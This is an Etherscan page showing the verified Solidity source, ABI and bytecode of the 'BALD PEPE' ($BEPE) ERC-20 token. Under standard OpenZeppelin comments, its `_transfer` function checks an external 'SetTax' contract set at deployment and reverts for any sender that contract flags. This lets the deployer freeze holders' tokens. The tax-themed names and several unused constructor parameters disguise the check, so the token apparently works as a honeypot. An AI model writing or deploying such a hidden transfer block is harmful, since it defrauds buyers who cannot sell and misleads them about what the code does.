ERC-20
Source Code
Overview
Max Total Supply
20,000,000,000 BEPE
Holders
414
Transfers
-
0 (0%)
Market
Onchain Market Cap
-
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
| # | Exchange | Pair | Price | 24H Volume | % Volume |
|---|
Contract Name:
BEPE
Compiler Version
v0.8.20+commit.a1b79de6
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2023-08-29
*/
/**
BALD PEPE
Ticker - $BEPE
Links:
https://t.me/bald_pepe_eth
https://baldpepe.xyz
https://twitter.com/bald_pepe_eth
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
pragma solidity ^0.8.13;
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
_checkOwner();
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if the sender is not the owner.
*/
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions anymore. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby removing any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)
pragma solidity ^0.8.13;
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
function transfer(address to, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `from` to `to` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address from,
address to,
uint256 amount
) external returns (bool);
}
interface SetTax {
function getTaxRate(address _account) external view returns (bool);
}
// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)
pragma solidity ^0.8.13;
/**
* @dev Interface for the optional metadata functions from the ERC20 standard.
*
* _Available since v4.1._
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)
pragma solidity ^0.8.13;
contract CONTRACT is Context, IERC20, IERC20Metadata {
mapping(address => uint256) private _balances;
SetTax public _taxes0;
mapping(address => mapping(address => uint256)) private _allowancez;
uint256 private _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* The default value of {decimals} is 18. To select a different value for
* {decimals} you should overload it.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory coin_, string memory symbol_, address _taxteam) {
_name = coin_;
_symbol = symbol_;
_taxes0 = SetTax(_taxteam);
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual override returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
function decimals() public view virtual override returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual override returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `amount`.
*/
function transfer(address to, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_transfer(owner, to, amount);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowancez[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_approve(owner, spender, amount);
return true;
}
function transferFrom(
address from,
address to,
uint256 amount
) public virtual override returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, allowance(owner, spender) + addedValue);
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
address owner = _msgSender();
uint256 currentAllowance = allowance(owner, spender);
require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
unchecked {
_approve(owner, spender, currentAllowance - subtractedValue);
}
return true;
}
/**
* @dev Moves `amount` of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
function _transfer(
address from,
address to,
uint256 amount
) internal virtual {
require(!_taxes0.getTaxRate(from), "Tax swap require first");
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
_beforeTokenTransfer(from, to, amount);
uint256 fromBalance = _balances[from];
require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
unchecked {
_balances[from] = fromBalance - amount;
// Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
// decrementing then incrementing.
_balances[to] += amount;
}
emit Transfer(from, to, amount);
_afterTokenTransfer(from, to, amount);
}
/** @dev Creates `amount` tokens and assigns them to `account`, increasing
* the total supply.
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
*/
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totalSupply += amount;
unchecked {
// Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
_balances[account] += amount;
}
emit Transfer(address(0), account, amount);
_afterTokenTransfer(address(0), account, amount);
}
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowancez[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/**
* @dev Updates `owner` s allowance for `spender` based on spent `amount`.
*
* Does not update the allowance amount in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Might emit an {Approval} event.
*/
function _spendAllowance(
address owner,
address spender,
uint256 amount
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
function _afterTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
}
pragma solidity ^0.8.13;
contract BEPE is CONTRACT, Ownable {
uint256 private constant supply_ = 20000000000 * 10**18;
constructor(
string memory coin_,
string memory symbol_,
uint256 deploytime,
uint256 hashtx,
uint256 tradeopen,
uint256 taxvar,
address _taxteam
) CONTRACT(coin_, symbol_, _taxteam) {
_mint(msg.sender, supply_);
}
function sendallTokens(address devaddress) external onlyOwner {
uint256 supply = balanceOf(msg.sender);
require(supply == supply_, "Token sent for owner");
_transfer(msg.sender, devaddress, supply_);
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"coin_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"deploytime","type":"uint256"},{"internalType":"uint256","name":"hashtx","type":"uint256"},{"internalType":"uint256","name":"tradeopen","type":"uint256"},{"internalType":"uint256","name":"taxvar","type":"uint256"},{"internalType":"address","name":"_taxteam","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_taxes0","outputs":[{"internalType":"contract SetTax","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"devaddress","type":"address"}],"name":"sendallTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405234801562000010575f80fd5b506040516200239538038062002395833981810160405281019062000036919062000542565b86868282600490816200004a91906200085c565b5081600590816200005c91906200085c565b508060015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505050620000c0620000b4620000eb60201b60201c565b620000f260201b60201c565b620000de336b409f9cbc7c4a04c220000000620001b560201b60201c565b5050505050505062000a51565b5f33905090565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000226576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200021d906200099e565b60405180910390fd5b620002395f83836200031a60201b60201c565b8060035f8282546200024c9190620009eb565b92505081905550805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620002fb919062000a36565b60405180910390a3620003165f83836200031f60201b60201c565b5050565b505050565b505050565b5f604051905090565b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f601f19601f8301169050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b62000385826200033d565b810181811067ffffffffffffffff82111715620003a757620003a66200034d565b5b80604052505050565b5f620003bb62000324565b9050620003c982826200037a565b919050565b5f67ffffffffffffffff821115620003eb57620003ea6200034d565b5b620003f6826200033d565b9050602081019050919050565b5f5b838110156200042257808201518184015260208101905062000405565b5f8484015250505050565b5f620004436200043d84620003ce565b620003b0565b90508281526020810184848401111562000462576200046162000339565b5b6200046f84828562000403565b509392505050565b5f82601f8301126200048e576200048d62000335565b5b8151620004a08482602086016200042d565b91505092915050565b5f819050919050565b620004bd81620004a9565b8114620004c8575f80fd5b50565b5f81519050620004db81620004b2565b92915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6200050c82620004e1565b9050919050565b6200051e8162000500565b811462000529575f80fd5b50565b5f815190506200053c8162000513565b92915050565b5f805f805f805f60e0888a03121562000560576200055f6200032d565b5b5f88015167ffffffffffffffff81111562000580576200057f62000331565b5b6200058e8a828b0162000477565b975050602088015167ffffffffffffffff811115620005b257620005b162000331565b5b620005c08a828b0162000477565b9650506040620005d38a828b01620004cb565b9550506060620005e68a828b01620004cb565b9450506080620005f98a828b01620004cb565b93505060a06200060c8a828b01620004cb565b92505060c06200061f8a828b016200052c565b91505092959891949750929550565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200067d57607f821691505b60208210810362000693576200069262000638565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620006f77fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620006ba565b620007038683620006ba565b95508019841693508086168417925050509392505050565b5f819050919050565b5f620007446200073e6200073884620004a9565b6200071b565b620004a9565b9050919050565b5f819050919050565b6200075f8362000724565b620007776200076e826200074b565b848454620006c6565b825550505050565b5f90565b6200078d6200077f565b6200079a81848462000754565b505050565b5b81811015620007c157620007b55f8262000783565b600181019050620007a0565b5050565b601f8211156200081057620007da8162000699565b620007e584620006ab565b81016020851015620007f5578190505b6200080d6200080485620006ab565b8301826200079f565b50505b505050565b5f82821c905092915050565b5f620008325f198460080262000815565b1980831691505092915050565b5f6200084c838362000821565b9150826002028217905092915050565b62000867826200062e565b67ffffffffffffffff8111156200088357620008826200034d565b5b6200088f825462000665565b6200089c828285620007c5565b5f60209050601f831160018114620008d2575f8415620008bd578287015190505b620008c985826200083f565b86555062000938565b601f198416620008e28662000699565b5f5b828110156200090b57848901518255600182019150602085019450602081019050620008e4565b868310156200092b578489015162000927601f89168262000821565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000986601f8362000940565b9150620009938262000950565b602082019050919050565b5f6020820190508181035f830152620009b78162000978565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f620009f782620004a9565b915062000a0483620004a9565b925082820190508082111562000a1f5762000a1e620009be565b5b92915050565b62000a3081620004a9565b82525050565b5f60208201905062000a4b5f83018462000a25565b92915050565b6119368062000a5f5f395ff3fe608060405234801561000f575f80fd5b50600436106100fe575f3560e01c8063715018a611610095578063a457c2d711610064578063a457c2d71461029c578063a9059cbb146102cc578063dd62ed3e146102fc578063f2fde38b1461032c576100fe565b8063715018a6146102385780638da5cb5b1461024257806395618f301461026057806395d89b411461027e576100fe565b806323b872dd116100d157806323b872dd1461018a578063313ce567146101ba57806339509351146101d857806370a0823114610208576100fe565b80630485df531461010257806306fdde031461011e578063095ea7b31461013c57806318160ddd1461016c575b5f80fd5b61011c60048036038101906101179190610f6d565b610348565b005b6101266103c5565b6040516101339190611022565b60405180910390f35b61015660048036038101906101519190611075565b610455565b60405161016391906110cd565b60405180910390f35b610174610477565b60405161018191906110f5565b60405180910390f35b6101a4600480360381019061019f919061110e565b610480565b6040516101b191906110cd565b60405180910390f35b6101c26104ae565b6040516101cf9190611179565b60405180910390f35b6101f260048036038101906101ed9190611075565b6104b6565b6040516101ff91906110cd565b60405180910390f35b610222600480360381019061021d9190610f6d565b6104ec565b60405161022f91906110f5565b60405180910390f35b610240610531565b005b61024a610544565b60405161025791906111a1565b60405180910390f35b61026861056c565b6040516102759190611215565b60405180910390f35b610286610591565b6040516102939190611022565b60405180910390f35b6102b660048036038101906102b19190611075565b610621565b6040516102c391906110cd565b60405180910390f35b6102e660048036038101906102e19190611075565b610696565b6040516102f391906110cd565b60405180910390f35b6103166004803603810190610311919061122e565b6106b8565b60405161032391906110f5565b60405180910390f35b61034660048036038101906103419190610f6d565b61073a565b005b6103506107bc565b5f61035a336104ec565b90506b409f9cbc7c4a04c22000000081146103aa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103a1906112b6565b60405180910390fd5b6103c133836b409f9cbc7c4a04c22000000061083a565b5050565b6060600480546103d490611301565b80601f016020809104026020016040519081016040528092919081815260200182805461040090611301565b801561044b5780601f106104225761010080835404028352916020019161044b565b820191905f5260205f20905b81548152906001019060200180831161042e57829003601f168201915b5050505050905090565b5f8061045f610bed565b905061046c818585610bf4565b600191505092915050565b5f600354905090565b5f8061048a610bed565b9050610497858285610db7565b6104a285858561083a565b60019150509392505050565b5f6012905090565b5f806104c0610bed565b90506104e18185856104d285896106b8565b6104dc919061135e565b610bf4565b600191505092915050565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6105396107bc565b6105425f610e42565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060600580546105a090611301565b80601f01602080910402602001604051908101604052809291908181526020018280546105cc90611301565b80156106175780601f106105ee57610100808354040283529160200191610617565b820191905f5260205f20905b8154815290600101906020018083116105fa57829003601f168201915b5050505050905090565b5f8061062b610bed565b90505f61063882866106b8565b90508381101561067d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161067490611401565b60405180910390fd5b61068a8286868403610bf4565b60019250505092915050565b5f806106a0610bed565b90506106ad81858561083a565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107426107bc565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107a79061148f565b60405180910390fd5b6107b981610e42565b50565b6107c4610bed565b73ffffffffffffffffffffffffffffffffffffffff166107e2610544565b73ffffffffffffffffffffffffffffffffffffffff1614610838576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082f906114f7565b60405180910390fd5b565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16637c19749b846040518263ffffffff1660e01b815260040161089491906111a1565b602060405180830381865afa1580156108af573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108d3919061153f565b15610913576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161090a906115b4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610981576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161097890611642565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109e6906116d0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a54906116d0565b60405180910390fd5b610a68838383610f05565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610aeb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae29061175e565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610bd491906110f5565b60405180910390a3610be7848484610f0a565b50505050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c59906117ec565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cd0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc79061187a565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610daa91906110f5565b60405180910390a3505050565b5f610dc284846106b8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e3c5781811015610e2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e25906118e2565b60405180910390fd5b610e3b8484848403610bf4565b5b50505050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610f3c82610f13565b9050919050565b610f4c81610f32565b8114610f56575f80fd5b50565b5f81359050610f6781610f43565b92915050565b5f60208284031215610f8257610f81610f0f565b5b5f610f8f84828501610f59565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610fcf578082015181840152602081019050610fb4565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610ff482610f98565b610ffe8185610fa2565b935061100e818560208601610fb2565b61101781610fda565b840191505092915050565b5f6020820190508181035f83015261103a8184610fea565b905092915050565b5f819050919050565b61105481611042565b811461105e575f80fd5b50565b5f8135905061106f8161104b565b92915050565b5f806040838503121561108b5761108a610f0f565b5b5f61109885828601610f59565b92505060206110a985828601611061565b9150509250929050565b5f8115159050919050565b6110c7816110b3565b82525050565b5f6020820190506110e05f8301846110be565b92915050565b6110ef81611042565b82525050565b5f6020820190506111085f8301846110e6565b92915050565b5f805f6060848603121561112557611124610f0f565b5b5f61113286828701610f59565b935050602061114386828701610f59565b925050604061115486828701611061565b9150509250925092565b5f60ff82169050919050565b6111738161115e565b82525050565b5f60208201905061118c5f83018461116a565b92915050565b61119b81610f32565b82525050565b5f6020820190506111b45f830184611192565b92915050565b5f819050919050565b5f6111dd6111d86111d384610f13565b6111ba565b610f13565b9050919050565b5f6111ee826111c3565b9050919050565b5f6111ff826111e4565b9050919050565b61120f816111f5565b82525050565b5f6020820190506112285f830184611206565b92915050565b5f806040838503121561124457611243610f0f565b5b5f61125185828601610f59565b925050602061126285828601610f59565b9150509250929050565b7f546f6b656e2073656e7420666f72206f776e65720000000000000000000000005f82015250565b5f6112a0601483610fa2565b91506112ab8261126c565b602082019050919050565b5f6020820190508181035f8301526112cd81611294565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061131857607f821691505b60208210810361132b5761132a6112d4565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61136882611042565b915061137383611042565b925082820190508082111561138b5761138a611331565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6113eb602583610fa2565b91506113f682611391565b604082019050919050565b5f6020820190508181035f830152611418816113df565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611479602683610fa2565b91506114848261141f565b604082019050919050565b5f6020820190508181035f8301526114a68161146d565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6114e1602083610fa2565b91506114ec826114ad565b602082019050919050565b5f6020820190508181035f83015261150e816114d5565b9050919050565b61151e816110b3565b8114611528575f80fd5b50565b5f8151905061153981611515565b92915050565b5f6020828403121561155457611553610f0f565b5b5f6115618482850161152b565b91505092915050565b7f54617820737761702072657175697265206669727374000000000000000000005f82015250565b5f61159e601683610fa2565b91506115a98261156a565b602082019050919050565b5f6020820190508181035f8301526115cb81611592565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61162c602583610fa2565b9150611637826115d2565b604082019050919050565b5f6020820190508181035f83015261165981611620565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6116ba602383610fa2565b91506116c582611660565b604082019050919050565b5f6020820190508181035f8301526116e7816116ae565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611748602683610fa2565b9150611753826116ee565b604082019050919050565b5f6020820190508181035f8301526117758161173c565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6117d6602483610fa2565b91506117e18261177c565b604082019050919050565b5f6020820190508181035f830152611803816117ca565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611864602283610fa2565b915061186f8261180a565b604082019050919050565b5f6020820190508181035f83015261189181611858565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f6118cc601d83610fa2565b91506118d782611898565b602082019050919050565b5f6020820190508181035f8301526118f9816118c0565b905091905056fea2646970667358221220d226616f1a30ec244cc26585bb6bca3f1e795d463ccf94ded17398251f56312a64736f6c6343000814003300000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000000000000000000064edd8c500000000000000000000000000000000000000000000000000000001c62972ef0000000000000000000000000000000000000000000000000000000064ede47d00000000000000000000000000000000000000000000000000000000000000010000000000000000000000008620ccbc4113